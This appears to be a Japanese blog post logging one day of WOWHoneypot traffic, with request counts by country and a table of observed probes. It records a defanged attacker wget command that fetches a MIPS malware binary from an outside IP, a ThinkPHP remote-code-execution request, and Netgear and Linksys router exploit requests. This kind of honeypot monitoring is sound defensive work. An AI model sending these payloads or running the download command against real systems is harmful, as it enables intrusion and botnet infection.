WOWHoneypot観察(252日目)
2019/11/23(土)
トータルは200件でした。
ハンティングログは以下です。
| 24.154.105[.]191 wget+hxxp[:]//185.172.110[.]220/mipsel |
www.virustotal.com
www.virustotal.com
IPのロケーション別の件数は以下です。
| 中国 | 81 |
| アメリカ | 52 |
| ロシア | 15 |
| ドイツ | 12 |
| フランス | 7 |
| インドネシア | 6 |
| ブラジル | 4 |
| インド | 3 |
| オランダ | 2 |
| イタリア | 2 |
| ポーランド | 2 |
| イラン | 2 |
| セルビア | 1 |
| レバノン | 1 |
| トルコ | 1 |
| 台湾 | 1 |
| ホンジュラス | 1 |
| スイス | 1 |
| アルゼンチン | 1 |
| ボリビア | 1 |
| イギリス | 1 |
| 香港 | 1 |
| カナダ | 1 |
| カンボジア | 1 |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 75 | アクセス | GET / |
| 11 | phpMyAdminの調査 | GET /scripts/setup.php |
| 10 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
| 10 | phpMyAdminの調査 | GET /phpmyadmin/setup.php |
| 10 | phpMyAdminの調査 | GET /phpmyadmin/scripts/_setup.php |
| 10 | phpMyAdminの調査 | GET /mysql/scripts/setup.php |
| 10 | HordeIMPの調査 | GET /imp/test.php |
| 10 | phpMyAdminの調査 | GET /_phpmyadmin/scripts/setup.php |
| 10 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
| 9 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
| 7 | ThinkPHPの調査 | GET /TP/public/index.php |
| 6 | ThinkPHPの調査 | POST /TP/public/index.php?s=captcha |
| 6 | ThinkPHPの調査 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 3 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 3 | Tomcat管理ページの調査 | GET /manager/html |
| 1 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
| 1 | PHPの設定内容の調査 | HEAD /phpinfo.php |
| 1 | PHPの設定内容の調査 | HEAD /%20phpinfo.php |
| 1 | 不正中継の調査 | GET hxxp[:]//www.youdao.com/?0.918428587610677633158124 |
| 1 | 不正中継の調査 | GET hxxp[:]//www.neti.ee/?0.54182092403494703466788 |
| 1 | DGN1000 Netgear ルータを狙うMirai亜種の攻撃 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 |
| 1 | 調査 | GET /script |
| 1 | ASP管理ページの調査? | GET /manager/top.asp |
| 1 | 不明 | GET /js/preload/example.txt |
| 1 | 調査 | GET /cgi-bin |
にほんブログ村